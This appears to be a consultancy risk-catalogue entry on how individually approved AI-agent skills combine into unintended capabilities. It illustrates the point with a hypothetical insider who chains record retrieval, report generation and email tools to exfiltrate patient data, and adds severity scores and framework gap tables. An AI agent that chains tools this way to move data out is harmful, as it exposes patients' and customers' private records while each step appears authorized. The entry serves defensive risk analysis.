Independently safe skills interact in unintended ways when composed. Each skill in isolation was safe. The composition creates emergent risk that no individual skill test would detect.
Skills and plugins are tested and approved individually. A skill labeled "send email" is safe if used appropriately. A skill labeled "retrieve database records" is safe if used for authorized purposes. But when these skills are composed, new attack surfaces emerge.
Data-Retrieval + Email-Sending = potential exfiltration path. The institution tested each skill in isolation and approved both. But when an agent invokes Data-Retrieval to get sensitive data and then invokes Email-Sending to send that data to an external address, the institution has created an unintended exfiltration path. Skill composition risk is not about malicious skills. Both skills are legitimate and safe individually. The risk is that the combination of legitimate skills creates unintended capabilities that were not tested or approved.
A healthcare provider deploys a clinical support agent with several approved skills: "Patient-Record-Retrieval" (retrieve patient medical records), "Lab-Order-Creator" (create lab orders), "Email-Notifier" (send email notifications to care team), and "Report-Generator" (generate clinical reports). Each skill was individually approved by the healthcare IT team.
A bad-actor physician (insider threat) uses the clinical agent to execute the following workflow: (1) invokes Patient-Record-Retrieval to retrieve medical records for 50 random patients, (2) invokes Report-Generator to create clinical summaries for these patients, (3) invokes Email-Notifier to send summaries to external email addresses (attacker's accounts).
The physician has created an exfiltration pipeline using individually approved skills. Each skill invocation is logged and appears authorized (the physician has authority to retrieve records, generate reports, and send emails to care team). But the composition creates unauthorized data exfiltration.
The attacker-physician sells the patient records to a healthcare data broker. When the hospital discovers the breach, it finds that the exfiltration occurred through skill composition: legitimate skills were chained in unintended ways to achieve exfiltration.
| Dimension | Score | Rationale |
|---|---|---|
| D - Detectability | 3 | Skill composition attacks may go undetected if each skill invocation appears individually authorized. Detecting the pattern requires behavior analysis. |
| A - Autonomy Sensitivity | 3 | High when agents autonomously compose skills. Less risk if humans manually invoke each skill. |
| M - Multiplicative Potential | 4 | Affects every skill composition. Potential interaction patterns scale exponentially with number of skills. |
| A - Attack Surface | 3 | Skill composition creates attack surface. Attackers exploit the composition to achieve unintended effects. |
| G - Governance Gap | 4 | Institutions approve skills individually; governance does not address composition risk. Institutions lack frameworks for skill composition vetting. |
| E - Enterprise Impact | 4 | Enables data exfiltration, abuse of approved capabilities, and insider threat exploitation. |
| Composite DAMAGE Score | 3.8 | High. Requires dedicated controls and monitoring. Should not be accepted without mitigation. |
How severity changes across the agent architecture spectrum.
| Agent Type | Impact | How This Risk Manifests |
|---|---|---|
| Digital Assistant | Low | Human manually invokes skills one at a time with explicit intent. Composition risk is low. |
| Digital Apprentice | Low-Med | Agents compose skills but with human oversight. Unusual compositions are flagged. |
| Autonomous Agent | High | Agents autonomously compose skills to achieve goals. Composition patterns may not have been tested. |
| Delegating Agent | High | Primary function is to invoke skills in sequence. Composition of tools creates attack surface. |
| Agent Crew / Pipeline | Med-High | Crew agents compose skills across crew. Interactions between agents' skill invocations create composition risk. |
| Agent Mesh / Swarm | Very High | Mesh agents dynamically compose skills from global pool. Composition patterns are unpredictable and untested. |
| Framework | Coverage | Citation | What It Addresses | What It Misses |
|---|---|---|---|---|
| NIST AI RMF 1.0 | Minimal | MAP 5.1 (Component Interactions) | System performance and component interactions. | Skill composition risk and unintended capability emergence. |
| OWASP Agentic Top 10 | Not Directly | Agentic security. | Skill composition attacks. | |
| GDPR Article 32 | Partial | Data Security | Integrity and confidentiality safeguards. | Skill composition exfiltration paths. |
| HIPAA BAA | Partial | Safeguards Rule | PHI protection. | Skill composition exploitation. |
In healthcare, data protection regulations (HIPAA) require safeguards against unauthorized access and exfiltration. Skill composition attacks can bypass traditional safeguards because each individual skill invocation is authorized. The composition creates the vulnerability.
In finance, skill composition risk enables insider threat exploitation. An employee authorized to retrieve customer records and send emails could use skill composition to exfiltrate customer data.
Skill Composition and Interaction Risk requires architectural controls that go beyond what existing frameworks provide. Our advisory engagements are purpose-built for banks, insurers, and financial institutions subject to prudential oversight.
Schedule a Briefing